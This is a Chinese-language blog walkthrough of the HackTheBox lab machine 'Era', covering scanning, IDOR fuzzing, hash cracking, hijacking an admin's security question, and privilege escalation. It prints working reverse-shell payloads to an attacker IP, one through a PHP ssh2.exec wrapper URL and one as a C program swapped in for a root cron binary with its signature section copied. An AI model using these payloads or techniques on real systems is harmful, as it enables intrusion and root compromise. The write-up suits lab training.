HackTheBox-Era

我还在这儿
忽然就没有力气了

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
 ./rustscan -a 10.10.11.79
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
0day was here ♥

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.79:21
Open 10.10.11.79:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-17 01:04 EST
Initiating Ping Scan at 01:04
Scanning 10.10.11.79 [4 ports]
Completed Ping Scan at 01:04, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:04
Completed Parallel DNS resolution of 1 host. at 01:04, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 01:04
Scanning 10.10.11.79 [2 ports]
Discovered open port 80/tcp on 10.10.11.79
Discovered open port 21/tcp on 10.10.11.79
Completed SYN Stealth Scan at 01:04, 0.20s elapsed (2 total ports)
Nmap scan report for 10.10.11.79
Host is up, received echo-reply ttl 63 (0.097s latency).
Scanned at 2025-11-17 01:04:41 EST for 0s

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.44 seconds
           Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
1
2
3
4
5
6
7
8
9
10
11
12
ftp 10.10.11.79
Connected to 10.10.11.79.
220 (vsFTPd 3.0.5)
Name (10.10.11.79:kali): anonymous
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed
ftp> 
ftp> exit
221 Goodbye.

ftp没法匿名登录,查看web界面。

合理怀疑是这几个人名中的一个,先将这些人名写成字典备用。

子域名爆破有结果。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
 gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://era.htb/ -t 30 --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://era.htb/
[+] Method:          GET
[+] Threads:         30
[+] Wordlist:        /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: file.era.htb Status: 200 [Size: 6765]
Progress: 114441 / 114442 (100.00%)
===============================================================
Finished
===============================================================

四个选项都提示登录,但用上面的人名配上常见的弱密码都没有结果。

ftp也尝试爆破,没有结果。

尝试爆破目录。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
# dirsearch -u http://file.era.htb
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                           
 (_||| _) (/_(_|| (_| )                                                                                                                                    
                                                                                                                                                           
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/http_file.era.htb/_25-11-17_01-36-25.txt

Target: http://file.era.htb/

[01:36:25] Starting:                                                                                                                                       
[01:36:30] 403 -  564B  - /.ht_wsr.txt                                      
[01:36:30] 403 -  564B  - /.htaccess.sample                                 
[01:36:30] 403 -  564B  - /.htaccess.orig
[01:36:30] 403 -  564B  - /.htaccess.bak1
[01:36:30] 403 -  564B  - /.htaccess.save
[01:36:30] 403 -  564B  - /.htaccess_extra                                  
[01:36:30] 403 -  564B  - /.htaccess_orig                                   
[01:36:30] 403 -  564B  - /.htaccess_sc                                     
[01:36:30] 403 -  564B  - /.htaccessBAK
[01:36:30] 403 -  564B  - /.htaccessOLD
[01:36:30] 403 -  564B  - /.htaccessOLD2
[01:36:30] 403 -  564B  - /.htm                                             
[01:36:30] 403 -  564B  - /.html                                            
[01:36:30] 403 -  564B  - /.httr-oauth                                      
[01:36:30] 403 -  564B  - /.htpasswds                                       
[01:36:30] 403 -  564B  - /.htpasswd_test                                   
[01:36:49] 301 -  178B  - /assets  ->  http://file.era.htb/assets/          
[01:36:49] 403 -  564B  - /assets/
[01:36:58] 302 -    0B  - /download.php  ->  login.php                      
[01:37:01] 301 -  178B  - /files  ->  http://file.era.htb/files/            
[01:37:01] 403 -  564B  - /files/                                           
[01:37:01] 403 -  564B  - /files/cache/                                     
[01:37:01] 403 -  564B  - /files/tmp/
[01:37:04] 403 -  564B  - /images/                                          
[01:37:04] 301 -  178B  - /images  ->  http://file.era.htb/images/          
[01:37:08] 200 -   34KB - /LICENSE                                          
[01:37:09] 200 -    9KB - /login.php                                        
[01:37:09] 200 -   70B  - /logout.php                                       
[01:37:10] 302 -    0B  - /manage.php  ->  login.php                        
[01:37:20] 200 -    3KB - /register.php                                     
[01:37:31] 302 -    0B  - /upload.php  ->  login.php

扫到了一个注册界面,注册账号成功登录,似乎可以上传文件。

上传文件后给了一个下载链接。

1
http://file.era.htb/download.php?id=7817

注意到有个参数id。

可能还有其他的文件可以下载,fuzz一下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
ffuf -u "http://file.era.htb/download.php?id=FUZZ" -w id.txt -H 'Cookie:PHPSESSID=jufdhn16ovg3aop3qtp2jevmgg' -fw 3161

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://file.era.htb/download.php?id=FUZZ
 :: Wordlist         : FUZZ: /home/kali/Desktop/id.txt
 :: Header           : Cookie: PHPSESSID=jufdhn16ovg3aop3qtp2jevmgg
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 3161
________________________________________________

54                      [Status: 200, Size: 6378, Words: 2552, Lines: 222, Duration: 141ms]
150                     [Status: 200, Size: 6366, Words: 2552, Lines: 222, Duration: 93ms]
:: Progress: [1000/1000] :: Job [1/1] :: 441 req/sec :: Duration: [0:00:03] :: Errors: 0 ::

访问第54个,发现了可能是网站源码。

下载下来发现里面有数据库文件,里面有密码。

成功破解出两个用户的密码。

1
2
3
4
5
6
7
8
9
10
11
12
john hash.txt --wordlist=rockyou.txt    
Using default input encoding: UTF-8
Loaded 6 password hashes with 6 different salts (bcrypt [Blowfish 32/64 X3])
Loaded hashes with cost 1 (iteration count) varying from 1024 to 4096
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
america          (eric)     
mustang          (yuri)     
2g 0:00:01:55 0.03% (ETA: 2025-11-21 08:41) 0.01735g/s 47.17p/s 193.6c/s 193.6C/s marias..ilovejack
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

但是登录上去没有文件可以修改,尝试以管理员的身份登录。

这里非常奇怪的是,以A用户的身份登录可以修改B用户的密保问题,利用这一点修改管理员的密保问题。

成功以管理员的身份登录。

下载底下的sign文件,发现有个邮箱,不知道有什么用。

GetEric

之后这一块没想到好的利用点,回去看ftp服务,发现yuri用数据库里的凭证可以登录上去。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
ftp 10.10.11.79 
Connected to 10.10.11.79.
220 (vsFTPd 3.0.5)
Name (10.10.11.79:kali): yuri
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||62972|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jul 22 08:42 apache2_conf
drwxr-xr-x    3 0        0            4096 Jul 22 08:42 php8.1_conf

进到php8.1目录里,发现ssh2服务可用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
sh2://
ssh2:// — 安全外壳协议 2

说明
ssh2.shell:// ssh2.exec:// ssh2.tunnel:// ssh2.sftp:// ssh2.scp:// (PECL)

注意: 该封装器默认没有激活
为了使用 ssh2.*:// 封装协议,必须从 » PECL 中安装有效的 » SSH2 扩展。

除了支持传统的 URI 登录信息,ssh2 封装协议也支持通过 URL 的主机(host)部分来复用打开连接。

用法
ssh2.shell://user:pass@example.com:22/xterm
ssh2.exec://user:pass@example.com:22/usr/local/bin/somecmd
ssh2.tunnel://user:pass@example.com:22/192.168.0.1:14
ssh2.sftp://user:pass@example.com:22/path/to/filename

同时审计之前的download.php,发现当用户为管理员时,可以控制fopen函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
// BETA (Currently only available to the admin) - Showcase file instead of downloading it
	} elseif ($_GET['show'] === "true" && $_SESSION['erauser'] === 1) {
    		$format = isset($_GET['format']) ? $_GET['format'] : '';
    		$file = $fetched[0];

		if (strpos($format, '://') !== false) {
        		$wrapper = $format;
        		header('Content-Type: application/octet-stream');
    		} else {
        		$wrapper = '';
        		header('Content-Type: text/html');
    		}

    		try {
        		$file_content = fopen($wrapper ? $wrapper . $file : $file, 'r');
			$full_path = $wrapper ? $wrapper . $file : $file;
			// Debug Output
			echo "Opening: " . $full_path . "\n";
        		echo $file_content;
    		} catch (Exception $e) {
        		echo "Error reading file: " . $e->getMessage();
    		}

构造payload。

1
http://file.era.htb/download.php?id=150&show=true&format=ssh2.exec://eric:america@127.0.0.1:22/bash+-i+%3E%26+/dev/tcp/10.10.16.20/4444+0%3E%261;

Root

上传pspy64查看进程。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
2025/11/17 06:51:44 CMD: UID=1000  PID=12568  | /bin/bash -i 
2025/11/17 06:52:01 CMD: UID=0     PID=12572  | /usr/sbin/CRON -f -P 
2025/11/17 06:52:01 CMD: UID=0     PID=12573  | /usr/sbin/CRON -f -P 
2025/11/17 06:52:01 CMD: UID=0     PID=12574  | bash -c /root/initiate_monitoring.sh 
2025/11/17 06:52:01 CMD: UID=???   PID=12575  | ???
2025/11/17 06:52:01 CMD: UID=0     PID=12576  | /bin/bash /root/initiate_monitoring.sh 
2025/11/17 06:52:01 CMD: UID=0     PID=12577  | openssl asn1parse -inform DER -in text_sig_section.bin 
2025/11/17 06:52:01 CMD: UID=0     PID=12580  | /bin/bash /root/initiate_monitoring.sh 
2025/11/17 06:52:01 CMD: UID=0     PID=12578  | /bin/bash /root/initiate_monitoring.sh 
2025/11/17 06:52:01 CMD: UID=0     PID=12583  | 
2025/11/17 06:52:01 CMD: UID=0     PID=12581  | /bin/bash /root/initiate_monitoring.sh 
2025/11/17 06:52:01 CMD: UID=0     PID=12584  | /bin/bash /root/initiate_monitoring.sh 
2025/11/17 06:52:04 CMD: UID=0     PID=12585  | 
2025/11/17 06:52:16 CMD: UID=1000  PID=12586  | cat user.txt 
2025/11/17 06:52:38 CMD: UID=1000  PID=12589  | /bin/bash -i 
2025/11/17 06:52:47 CMD: UID=1000  PID=12591  | ls --color=auto -la 
2025/11/17 06:52:57 CMD: UID=1000  PID=12594  | /bin/bash -i 
2025/11/17 06:53:01 CMD: UID=0     PID=12603  | /usr/sbin/CRON -f -P 
2025/11/17 06:53:01 CMD: UID=0     PID=12604  | /bin/sh -c bash -c '/root/initiate_monitoring.sh' >> /opt/AV/periodic-checks/status.log 2>&1 
2025/11/17 06:53:01 CMD: UID=0     PID=12605  | 
2025/11/17 06:53:01 CMD: UID=0     PID=12606  | /bin/bash /root/initiate_monitoring.sh 
2025/11/17 06:53:01 CMD: UID=0     PID=12608  | /bin/bash /root/initiate_monitoring.sh 
2025/11/17 06:53:01 CMD: UID=0     PID=12607  | /bin/bash /root/initiate_monitoring.sh 
2025/11/17 06:53:01 CMD: UID=0     PID=12610  | /bin/bash /root/initiate_monitoring.sh 
2025/11/17 06:53:01 CMD: UID=0     PID=12609  | /bin/bash /root/initiate_monitoring.sh 
2025/11/17 06:53:01 CMD: UID=0     PID=12611  | grep -oP (?<=UTF8STRING        :)Era Inc. 
2025/11/17 06:53:01 CMD: UID=0     PID=12614  | /bin/bash /root/initiate_monitoring.sh 
2025/11/17 06:53:01 CMD: UID=0     PID=12612  | /bin/bash /root/initiate_monitoring.sh 
2025/11/17 06:53:01 CMD: UID=0     PID=12615  | /bin/bash /root/initiate_monitoring.sh

注意到root非常频繁的执行initiate_monitoring.sh这个任务

上传linpeas后注意到我们可写一个文件。

1
2
3
4
5
6
7
8
9
10
eric@era:/opt/AV/periodic-checks$ ls -al
total 32
drwxrwxr-- 2 root devs  4096 Nov 17 06:56 .
drwxrwxr-- 3 root devs  4096 Jul 22 08:42 ..
-rwxrw---- 1 root devs 16544 Nov 17 06:56 monitor
-rw-rw---- 1 root devs   307 Nov 17 06:56 status.log
eric@era:/opt/AV/periodic-checks$ id
uid=1000(eric) gid=1000(eric) groups=1000(eric),1001(devs)
eric@era:/opt/AV/periodic-checks$

结合之前的进程,知道这个东西会被定期执行,写好替换即可。

1
2
3
4
5
6
 cat pwn.c 
int main() {
    system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.20/9999 0>&1'");
    return 0;
}

(这里要记得复制monitor的特征码,因为他会检测,直接上传是不行的。)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
eric@era:/opt/AV/periodic-checks$ wget 10.10.16.20/pwn.c
--2025-11-17 06:59:57--  http://10.10.16.20/pwn.c
Connecting to 10.10.16.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 101 [text/x-csrc]
Saving to: ‘pwn.c’

pwn.c                                  100%[============================================================================>]     101  --.-KB/s    in 0s      

2025-11-17 06:59:57 (12.9 MB/s) - ‘pwn.c’ saved [101/101]

eric@era:/opt/AV/periodic-checks$ gcc pwn.c -o pwn
pwn.c: In function ‘main’:
pwn.c:2:5: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
    2 |     system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.20/9999 0>&1'");
1
2
3
4
5
6
eric@era:/opt/AV/periodic-checks$ objcopy --dump-section .text_sig=text_sig /opt/AV/periodic-checks/monitor
objcopy: unable to copy file '/opt/AV/periodic-checks/monitor'; reason: Text file busy
eric@era:/opt/AV/periodic-checks$ objcopy --dump-section .text_sig=text_sig /opt/AV/periodic-checks/monitor
eric@era:/opt/AV/periodic-checks$ objcopy --add-section .text_sig=text_sig pwn
eric@era:/opt/AV/periodic-checks$ cp pwn monitor

#HTB
HackTheBox-Era
http://example.com/2025/11/17/HackTheBox-Era/
Author
Skyarrow
Posted on
November 17, 2025
Licensed under